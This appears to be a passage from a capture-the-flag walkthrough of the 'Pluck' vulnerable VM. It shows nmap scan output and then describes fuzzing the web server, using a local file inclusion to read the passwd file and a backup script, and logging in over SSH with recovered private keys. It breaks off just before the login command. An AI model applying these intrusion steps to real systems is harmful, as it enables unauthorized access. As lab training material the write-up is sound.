To start things off, let’s run an nmap scan against the target (This VM lets you know what the assigned IP address is above the login prompt):

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

Nmap scan report for192.168.110.129

Host isup(0.00014slatency).

Notshown:65531closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH7.3p1Ubuntu1(Ubuntu Linux;protocol2.0)

|ssh-hostkey:

|2048e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71(RSA)

|_2568f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd(ECDSA)

80/tcp open http Apache httpd2.4.18((Ubuntu))

|http-methods:

|_Supported Methods:GET HEAD POST OPTIONS

|_http-server-header:Apache/2.4.18(Ubuntu)

|_http-title:Pluck

3306/tcp open mysql MySQL(unauthorized)

5355/tcp open llmnr?

The most interesting thing here is the http port. Let’s have a look:

We’re presented with an index page containing the title of the VM. There isn’t really too much interesting going on in the different pages, so I decide to run wfuzz against it to see if there’s anything hiding:

So now we’ve got a several users: root, bob, peter, paul, and (The most interesting of them) backup-user. The backup user has a full path to a script in the passwd file, let’s see if we can grab it with the LFI:

It looks like bob has sudo privs and paul has a bunch of public/private ssh keys. Since we’ve got no way to access bob’s account for the moment, our only other option is to try to log into paul with the key’s we’ve got. After we “chmod 700” the files in this dir, we finally get in with id_key4 using the following command: